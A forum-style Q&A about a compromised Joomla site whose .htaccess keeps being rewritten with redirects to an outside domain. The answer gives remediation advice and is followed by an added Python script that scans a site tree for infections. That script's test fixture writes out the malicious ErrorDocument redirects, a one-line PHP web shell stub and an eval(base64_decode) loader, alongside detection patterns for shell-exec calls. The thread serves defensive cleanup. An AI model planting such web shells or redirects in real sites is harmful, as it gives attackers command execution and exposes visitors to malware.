Virus/malware modifying .htaccess on Joomla CMS website

Pinch · Mar 20, 2012 · Viewed 8.4k times

I have a Joomla 1.0 website running on a shared host to which I don't have shell access (only FTP is available). Recently my website has been marked as a malware site by Google, and I noticed that the .htaccess file has been modified with malicious contents. These redirection rules to a website called 'depositpeter.ru' are added to the .htaccess:

ErrorDocument 400 http://depositpeter.ru/mnp/index.php
ErrorDocument 401 http://depositpeter.ru/mnp/index.php ...

If I clean this .htaccess file, it will be modified back with malicious contents a few minutes later.

I suspect that some backdoor PHP and JavaScript has been injected into our codebase which constantly modifies the .htaccess file. However, I have no idea how this malware landed on my site in the first place. I'm pretty sure that no FTP users have uploaded it to my site. A virus scan found that a user-uploaded image has been injected with PHP.ShellExec malware (I'm not sure how this PHP.ShellExec works or whether it is related to the .htaccess virus, though).

My question is: how should I start troubleshooting and cleaning this malware? I'm pretty clueless and have little experience dealing with web malware. Any help is greatly appreciated!

Answer

DCoder · Mar 20, 2012

It might be beyond your power to fix this yourself. But here are some things that you should do.

  • Download any apache/php logs you have - these can point to the security holes being exploited. If you can find the entries, make sure the holes are covered.
  • Remove the image that is indicated as infected.
  • Contact your host - several hosting companies have automated solutions to find and clean up common vulnerabilities. Also, if your site is infected, odds are, other clients on the same server are, too.
    • Conversely, it might be another client on the same server that's causing this problem for you.
  • Add an .htaccess file in the uploads directory that would prevent access to anything other than uploaded images. It might look something like this:

    # Apache 2.2 access-control syntax (needs mod_access_compat on Apache 2.4).
    # Default: refuse every request into this directory...
    Order deny,allow
    Deny from all
    # ...then re-allow only files whose name ends in an image extension.
    # The regex is case-sensitive, so "photo.JPG" would be blocked as well.
    <FilesMatch "\.(jpe?g|bmp|png)$">
    Allow from all
    </FilesMatch>

  • If your host hasn't blocked functions that allow php to invoke system commands (you'd be surprised) and you know what to do, you can mimic shell access with a custom php script using system, exec, popen and some other functions. I use a script I made myself: https://github.com/DCoderLT/Misc_Tools/blob/master/sh/sh.php . It's fairly primitive, but got the job done when I needed it to.

Future considerations:

  • Make backups. Your hosting company might provide these going back a certain period of time.
  • Keep an eye on the updates. Subscribe to the Joomla announcements mailing list. Apply these updates as quickly as you can. Popular applications like Joomla and WordPress are a frequent and easy target for script kiddies and automated bots.
  • Make backups.
  • Make sure your hosting company has the server set up properly, so that user A cannot affect user B's files (file permissions, suexec or similar). I don't know how common this is these days, but it used to be a frequent oversight in the past.
  • Make backups.
  • Don't leave write permissions enabled on files and folders that don't need it.
  • Make backups.
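The uploads .htaccess above stops browsers from requesting anything but images directly; it does not stop an already-planted PHP script from include()-ing an image that carries PHP code, and the .htaccess will keep being rewritten until the script doing the writing is found. With FTP-only access the practical approach is to pull the whole site tree down and triage it offline. The script below is an added example (not code from DCoder's answer or from the Joomla project) that looks for the three indicators described in this thread: ErrorDocument directives redirecting to an external host, image files carrying a PHP tag followed by a shell-exec call, and PHP files with an eval(base64_decode(...)) style loader. The TRUSTED_HOSTS set and the sample files built by demo() are constructed for the example; replace them with the real site's hostnames and the downloaded tree.

```python
"""Offline triage of a site tree downloaded over FTP.

Added example for this thread, not the original answer's code. Flags:
  1. .htaccess ErrorDocument directives that redirect to an untrusted host
  2. image files containing a PHP open tag followed by a shell-exec call
  3. PHP files that eval() a decoded/inflated payload
"""
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Hostnames the site legitimately redirects to (assumption for the demo).
TRUSTED_HOSTS = {"example.com", "www.example.com"}

ERRORDOC_RE = re.compile(r"^[ \t]*ErrorDocument[ \t]+(\d{3})[ \t]+(\S+)", re.I | re.M)
PHP_TAG_RE = re.compile(rb"<\?(php|=)", re.I)
SHELL_FUNC_RE = re.compile(
    rb"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)
EVAL_LOADER_RE = re.compile(
    rb"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}
PHP_EXT = {".php", ".phtml"}


def suspicious_errordocs(htaccess_text, trusted_hosts=TRUSTED_HOSTS):
    """Return (status, url) for ErrorDocument targets on hosts not in trusted_hosts.

    Relative targets such as /404.html have no hostname and are ignored.
    """
    hits = []
    for status, target in ERRORDOC_RE.findall(htaccess_text):
        host = urlparse(target).hostname
        if host and host.lower() not in trusted_hosts:
            hits.append((int(status), target))
    return hits


def image_has_php(data):
    """True when an image carries a PHP open tag with a shell-exec call after it."""
    tag = PHP_TAG_RE.search(data)
    return bool(tag) and bool(SHELL_FUNC_RE.search(data, tag.end()))


def php_has_eval_loader(data):
    """True for the common obfuscated-loader pattern eval(base64_decode(...))."""
    return bool(EVAL_LOADER_RE.search(data))


def scan_tree(root):
    """Walk a downloaded site tree; return sorted (relative_path, reason) findings."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        data = path.read_bytes()
        ext = path.suffix.lower()
        if path.name == ".htaccess":
            for status, url in suspicious_errordocs(data.decode("latin-1")):
                findings.append((rel, f"ErrorDocument {status} redirects to {url}"))
        elif ext in IMAGE_EXT and image_has_php(data):
            findings.append((rel, "PHP shell-exec code embedded in image"))
        elif ext in PHP_EXT and php_has_eval_loader(data):
            findings.append((rel, "eval() of decoded payload"))
    return sorted(findings)


def build_sample_site(root):
    """Write a constructed mini site tree mirroring the symptoms in the question."""
    root = Path(root)
    (root / "images" / "uploads").mkdir(parents=True)
    (root / "tmp").mkdir()
    (root / ".htaccess").write_text(
        "ErrorDocument 400 http://depositpeter.ru/mnp/index.php\n"
        "ErrorDocument 401 http://depositpeter.ru/mnp/index.php\n"
        "ErrorDocument 404 /404.html\n")
    # JPEG header followed by a PHP shell-exec stub (constructed sample).
    (root / "images" / "uploads" / "photo.jpg").write_bytes(
        b"\xff\xd8\xff\xe0\x00\x10JFIF\x00 <?php system($_GET['c']); ?>")
    # A clean image and a clean PHP file must not be flagged.
    (root / "images" / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n plain pixels")
    (root / "index.php").write_bytes(b"<?php echo base64_decode('aGk='); ?>")
    (root / "tmp" / "loader.php").write_bytes(
        b"<?php eval(base64_decode('ZWNobyAxOw==')); ?>")
    return root


def demo():
    """Build the constructed sample tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_tree(build_sample_site(tmp))


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

Run it against the downloaded tree with scan_tree("/path/to/site") after editing TRUSTED_HOSTS; anything it lists is a starting point, not a complete cleanup, since backdoors can be obfuscated well beyond these patterns. Cross-reference each flagged file's modification time with the downloaded access logs to find the request that planted it.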